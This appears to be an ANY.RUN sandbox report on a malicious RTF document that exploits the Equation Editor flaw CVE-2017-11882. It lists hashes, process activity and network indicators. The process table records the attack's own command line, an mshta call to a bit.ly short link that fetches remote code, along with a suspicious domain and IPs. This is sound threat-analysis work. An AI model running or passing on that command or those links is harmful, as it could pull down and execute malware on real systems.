analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

35-15449.doc

Full analysis: https://app.any.run/tasks/f6429b12-401b-4deb-b81e-8edba6471c8e
Verdict: Malicious activity
Analysis date: December 02, 2019, 21:55:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
exploit
CVE-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, unknown version
MD5:

DF0A6255B16F04DD4D7CC6CA99CE23AE

SHA1:

61BC9288C3E8286CBD8EF0092948A34D07BA0642

SHA256:

93CBBD74E04E4AB3A5CB545FEAA8922C128E0B3F4E054CB3453522C93B0954A9

SSDEEP:

1536:eManjjjjvv7/gYvrLrLrLrLrLrLrLrp5QuxyhFZiYC8tC1U1Y1Z1d1d1d1d1d1dB:ehjjjjvvEmFsDiYC80

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 1044)
  • SUSPICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 1044)
    • Executed via COM

      • EQNEDT32.EXE (PID: 1044)
    • Creates files in the user directory

      • mshta.exe (PID: 3676)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3960)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3960)
    • Reads internet explorer settings

      • mshta.exe (PID: 3676)
    • Application was crashed

      • EQNEDT32.EXE (PID: 1044)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe mshta.exe

Process information

PID
CMD
Path
Indicators
Parent process
3960"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\35-15449.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1044"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3676mshta http://bit.ly/35Qk8Lk &AAAAAAAAAAAAAAA CC:\Windows\system32\mshta.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Total events
2 058
Read events
970
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
3960WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE260.tmp.cvr
MD5:
SHA256:
3676mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txttext
MD5:BDDE29EE438EC929C9CAF0DFED83BC8D
SHA256:4D15598A6C31FFCCA395E964314718EEB35A74FFCDBA563A5BB485A0AFC64819
3960WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:92E4AE23EA4A277EC1EC2495E95A72F9
SHA256:73446FA4A66D1F8C23C7AD99A130123D293439E605FC6196A72079BC73951B5F
3960WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$-15449.doc.rtfpgc
MD5:204811F4CC3E60674DA13225B8FE13BC
SHA256:E615B8DD2D575CFAD880808E19F73DBE19014A7B985CA66DA28D335715B08E0F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3676
mshta.exe
67.199.248.11:80
bit.ly
Bitly Inc
US
shared
119.27.170.254:443
lichengcheng.net
Shenzhen Tencent Computer Systems Company Limited
CN
suspicious

DNS requests

Domain
IP
Reputation
bit.ly
  • 67.199.248.11
  • 67.199.248.10
shared
lichengcheng.net
  • 119.27.170.254
suspicious

Threats

PID
Process
Class
Message
3676
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
No debug info